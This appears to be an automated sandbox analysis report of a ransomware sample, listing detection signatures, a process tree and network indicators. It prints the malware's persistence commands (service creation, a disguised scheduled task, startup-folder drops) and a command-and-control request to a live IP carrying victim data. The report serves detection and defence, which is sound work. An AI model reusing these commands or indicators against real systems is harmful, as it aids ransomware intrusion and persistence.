Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xKvkNk9SXR.exe

Overview

General Information

Sample name:xKvkNk9SXR.exe
renamed because original name is a hash value
Original sample name:2619065d71a290ad0369cb3c19f1d5a58c43bf7abb52fb8828727483d32bdcf7.exe
Analysis ID:1569986
MD5:603b398c14ffc8c0b647c58e9886c557
SHA1:58b80929a19cfb40c683cc10f5c8167e5543c553
SHA256:2619065d71a290ad0369cb3c19f1d5a58c43bf7abb52fb8828727483d32bdcf7
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

TrojanRansom
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected TrojanRansom
AI detected suspicious sample
Contains functionality to clear event logs
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Sigma detected: Suspicious New Service Creation
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Checks for available system drives (often done to infect USB drives)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • xKvkNk9SXR.exe (PID: 7032 cmdline: "C:\Users\user\Desktop\xKvkNk9SXR.exe" MD5: 603B398C14FFC8C0B647C58E9886C557)
    • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1396 cmdline: C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • tasklist.exe (PID: 2104 cmdline: tasklist /v /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4508 cmdline: findstr /i "dcdcf" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 6004 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 4308 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 6508 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 6152 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 4708 cmdline: sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 2796 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 5880 cmdline: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wscript.exe (PID: 1440 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 5804 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6516 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 344 cmdline: tasklist /v MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 2072 cmdline: find /I /c "dcdcf" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 6584 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 2164 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 5300 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 5428 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 4980 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 5028 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 5796 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3772 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 5484 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 1476 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6300 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 4744 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 1868 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 2764 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 5972 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 2516 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6308 cmdline: tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 4688 cmdline: find /I "xKvkNk9SXR.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 1848 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • schtasks.exe (PID: 6488 cmdline: schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • WmiPrvSE.exe (PID: 5840 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
    • cmd.exe (PID: 6408 cmdline: C:\Windows\system32\cmd.exe /c echo %date%-%time% MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 7156 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 4984 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 1972 cmdline: find /i "os name" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 1276 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "original" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 6768 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 3116 cmdline: find /i "original" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 1628 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cmd.exe (PID: 5560 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 5496 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 1972 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5844 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 1848 cmdline: tasklist /v MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • find.exe (PID: 2608 cmdline: find /I /c "dcdcf" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  • Xinfecter.exe (PID: 4148 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" MD5: 603B398C14FFC8C0B647C58E9886C557)
    • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: xKvkNk9SXR.exe PID: 7032JoeSecurity_TrojanRansomYara detected TrojanRansomJoe Security
    Process Memory Space: Xinfecter.exe PID: 4148JoeSecurity_TrojanRansomYara detected TrojanRansomJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious File Creation In Uncommon AppData Folder
      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\xKvkNk9SXR.exe, ProcessId: 7032, TargetFilename: C:\Users\user\AppData\S-6748.bat
      Sigma detected: Suspicious New Service Creation
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6604, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 6004, ProcessName: sc.exe
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5880, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 1440, ProcessName: wscript.exe
      Sigma detected: Startup Folder File Write
      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\xKvkNk9SXR.exe, ProcessId: 7032, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5880, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 1440, ProcessName: wscript.exe
      Sigma detected: New Service Creation Using Sc.EXE
      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6604, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 6004, ProcessName: sc.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-06T13:51:12.165027+010020458211Malware Command and Control Activity Detected192.168.2.549705185.147.34.533586TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeReversingLabs: Detection: 81%
      Multi AV Scanner detection for submitted file
      Source: xKvkNk9SXR.exeReversingLabs: Detection: 81%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: xKvkNk9SXR.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A14230 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,0_2_00A14230
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A147F0 CryptReleaseContext,0_2_00A147F0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A14900 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,0_2_00A14900
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A14390 CryptAcquireContextA,GetLastError,CryptReleaseContext,0_2_00A14390
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A14720 CryptReleaseContext,0_2_00A14720
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A14760 CryptGenRandom,__CxxThrowException@8,0_2_00A14760
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00604230 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,42_2_00604230
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_006047F0 CryptReleaseContext,42_2_006047F0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00604900 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,42_2_00604900
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00604390 CryptAcquireContextA,GetLastError,CryptReleaseContext,42_2_00604390
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00604760 CryptGenRandom,__CxxThrowException@8,42_2_00604760
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00604720 CryptReleaseContext,42_2_00604720
      Source: xKvkNk9SXR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: xKvkNk9SXR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Users\Unknown\source\repos\ConsoleApplication5_A\Release\ConsoleApplication5_A.pdb source: xKvkNk9SXR.exe, Xinfecter.exe.0.dr
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: z:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: x:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: v:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: t:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: r:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: p:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: n:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: l:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: j:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: h:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: f:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: b:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: y:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: w:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: u:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: s:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: q:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: o:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: m:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: k:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: i:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: g:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: e:Jump to behavior
      Source: C:\Windows\System32\cmd.exeFile opened: c:
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeFile opened: a:Jump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C4500 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,0_2_009C4500
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B4500 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,42_2_005B4500
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C8240 SetErrorMode,FindFirstFileW,0_2_009C8240
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C8380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,0_2_009C8380
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009BFCC9 FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_009BFCC9
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009CAF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,0_2_009CAF50
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009C9ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_009C9ABA
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_00A7BA6B FindFirstFileExA,0_2_00A7BA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B8240 SetErrorMode,FindFirstFileW,42_2_005B8240
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B8380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,42_2_005B8380
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005BAF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,42_2_005BAF50
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0066BA6B FindFirstFileExA,42_2_0066BA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_005B9ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,42_2_005B9ABA
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeCode function: 0_2_009CD950 GetLogicalDriveStringsA,0_2_009CD950

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2045821 - Severity 1 - ET MALWARE [ANY.RUN] RCRU64 Ransomware Variant CnC Activity : 192.168.2.5:49705 -> 185.147.34.53:3586
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 3586
      Source: global trafficTCP traffic: 192.168.2.5:49705 -> 185.147.34.53:3586
      Source: global trafficHTTP traffic detected: GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:51:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~L8acq3ctygn4C5b6XsaUC8NQ4T5+jxiCsWkp7x/Hk8Cz2BBRGk0mufLQ+PUY1typcKrEwbK2Dj7BO9JOfDPuCfh3CsC3iPhAH2eScIc+GWLNXN+3hyXaq6j2YSWd5DmTTvK1Az6Y2HJdeT6zGl6i1w+ZGQLwGzy8RkS4oEtlW3UuJVLTmwGlR7YDbEAsKmRmfH7DPy5LzBAQywMQRipuvv+48axKwRXjo8jTBYqVPUjVsSEjhbXPLzM9Xl8KyCm8GT5vtwes3vLmsHwAGVQYt6Us2UTzSBdT9pgorDIbhDIj1Cwk35gD0LXznaGhiEJiInYLHVLDOXOWJKdNgqc46lWqA4wW0VuMf3EPOyqU5rpjqgp8qxSxJhTR/wcyQd2HbUZA16pPJXIZoJe2SIn/JT5eC9QAvRwM3UCi7ivb9fYZVrSlTF/thYWe80fZkyufyRCmdKQMuTBl9xsnavY9+hVq8Hy7mV1PPur7n4Wyf3wUh282zBNauAhJEyGreiPNkuZJ7x23lcM7XkLwGJb+Z4BlO6ZDi8aGpDuEQ8BIOqcf6mibsCw76IMfx9ChQBZaIs/VJIp1jERwD7V0DV/sfzVGP7doUDNiAsVwLAgERAoIBAANZ6J65BfEayvAoTqwqRhcFFqY07Esp26rpBoYFzh2iqppj+Qg1XNIc/Jmj0Yftn+AG2OhuMtx1EgFqSORxKm4bD4Bc+HC3ieUp23T40yyqEl7a4CbuZyrGUzpLTN+qK+wwVpPcL3Fiib71SbOTkZ1Cfflb3YPpD32a7G9NLQO4qsiKmwpC0NllcV8ej/lQSlji5ByZD6jQYAleNgPKm44Km75DSkIkh/BKY3Kp9/Ik/fCvaSh4vxRQdFUt4Jp4nTv+RBoGUGPYKktA5mJFUwaVBZvJbKQm9jcYthl29SqW5+KoBmKYDmnUwidST6jyaqC5WJD4FYRdPJlreKvOQKkCgYEAxNJeCd12amISe/f1l4spPEYmOngaEWyG+z89CH5Z9pncM7euMxJN7r+8f/bJcVQaASfNGyHaorGtJ7n/sh0BSY6exaa3xZxHwiJfDfOZRk11ABTE8g0AjXgxE230KEQ+eeg8uW7PhryGRtltV+Db4CPD+7AtFWw3VEEVBdb3/UcCgYEA3kygyXvm5a2jeQDrCOAsDxnN2DaCPwdeAEOelE74zS8GioFjrQ1iGiM6EEnHiieXszwskhhhAbQYDPNNXfSIH4PfaMPmT86RYcKkriGmEHPK8/DEMTnWjHnttHl5yDGlfEBPl3WZj3c5qLQ95XrGPtqnWo4z8sUjc0KOyG+ifR0CgYA544UR9deIs27ZKs/DKO4CqzhrjLxfekXRbP